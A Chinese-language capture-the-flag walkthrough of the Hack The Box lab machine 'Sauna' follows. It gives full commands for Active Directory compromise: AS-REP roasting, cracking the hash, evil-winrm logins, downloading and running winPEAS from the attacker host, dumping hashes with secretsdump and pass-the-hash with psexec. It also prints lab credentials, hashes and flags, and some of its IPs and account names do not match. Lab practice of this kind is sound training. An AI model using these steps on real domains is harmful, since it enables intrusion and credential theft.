友情提醒
本文阅读时间推荐20min,靶场练习推荐3H
CCSK(云安全)(已通过认证)
ISO/IEC 27001 Foundation(已通过认证)
***主要利用方式***
通过GetNPUsers.py获取 Kerberos 协议中的非预认证用户的TGT
获取hash后,使用john破解,得到一组用户及密码,突破边界
上传winPEAS,获取第二组用户名密码,查看可登录用户
通过类似的账号及密码,登录进入系统并使用secretsdump.py
转存用户及hash,再使用psexec.py进行登录,获取root权限
靶场: hackthebox.com
靶机名称: Sauna
难度: window.Easy
发布时间: Released on 15 Feb 2020
下载地址:https://app.hackthebox.com/machines/Sauna
备注:本靶场重点使用kali自带的impacket 这个目录文件
攻击IP:10.10.16.3
靶机IP:10.10.11.175
1、探测靶机ip地址
└─$ sudo nmap -n -v -sC -sV -Pn 10.10.11.108 -oN return_nmap.txt
2、探测80端口
http://10.10.10.175/
TCP 80端口目录扫描
└─$ dirsearch -u http://10.10.10.175/
SMB - TCP 445
└─$ smbmap -H 10.10.10.175
└─$ crackmapexec smb 10.10.10.175 --shares
└─$ smbclient -N -L //10.10.10.175
└─$ crackmapexec smb 10.10.10.175 -u 'anonymous' -p '' --shares
得到一个域名:EGOTISTICAL-BANK.LOCAL
DNS - TCP/UDP 53
└─$ dig axfr @10.10.10.175 sauna.htb
└─$ dig axfr @10.10.10.175 egotistical-bank.local
3、生成用户字典
在about us页面暴露出了team member的名字,手动制作一个用户名字典
4、使用GetNPUsers获取无认证用户信息
GetNPUsers.py是 impacket 工具集中的一个脚本,通常用于通过利用 Kerberos 协议中的某些特性来获取用户的相关信息,特别是针对那些不需要预认证(Pre-Authentication)的用户账户。
└─$ sudo python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile /home/kali/htb/sauna/user -outputfile hashes.asreproast -dc-ip 10.10.10.175
5、查看hashes并使用john破解
使用john对hashes进行暴力破解
获得一组密码:【fsmith/Thestrokes23】
6、使用evil-winrm登录,拿到user.txt
使用evil-winrm登录
└─$ evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
获取user.txt
*Evil-WinRM* PS C:UsersFSmithDocuments> cd ..
*Evil-WinRM* PS C:UsersFSmith> cd Desktop
t*Evil-WinRM* PS C:UsersFSmithDesktop>type user.txt
7、上传winPEAS进行提权
kali启动python web 服务
iwr上传winPEAS并执行
*Evil-WinRM* PS C:UsersFSmithDocuments> iwr -uri http://10.10.16.3/winPEASx64.exe-Outfile winPEAS.exe
*Evil-WinRM* PS C:UsersFSmithDocuments> .winPEAS.exe
发现一组账号密码:【svc_loanmanager/Moneymakestheworldgoround!】
8、使用FSmith探测可登录账号
对svc_loanmgr 查询用户信息
发现svc_loanmgr同样有远程登录权限,尝试使用密码Moneymakestheworldgoround!登录
切换账号,使用winrm登录
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
9、转存用户密码Hash
使用fsmith用户进行
└─$ usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23@10.10.10.175
使用svc_loanmgr用户进行操作
遇到特殊符号,用“”或者用引号包含起来皆可
└─$ /usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
└─$ /usr/share/doc/python3-impacket/examples/secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
获取一个administrator用户的hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
10、使用Impacket中的psexec.py登录
└─$ /usr/share/doc/python3-impacket/examples/psexec.py Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
11、进入administrator的桌面查看root.txt
C:Windowssystem32> cd C:UsersAdministrator
C:UsersAdministrator> cd Desktop
C:UsersAdministratorDesktop> type root.txt
ec1562582dee3fde2a433c452ea36ea1
本期靶场到此结束咯,欢迎添加好友进VX交流群
原文始发于微信公众号(从放弃到入门):【OSCP-HTB.02】Sauna靶机渗透测试练习
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论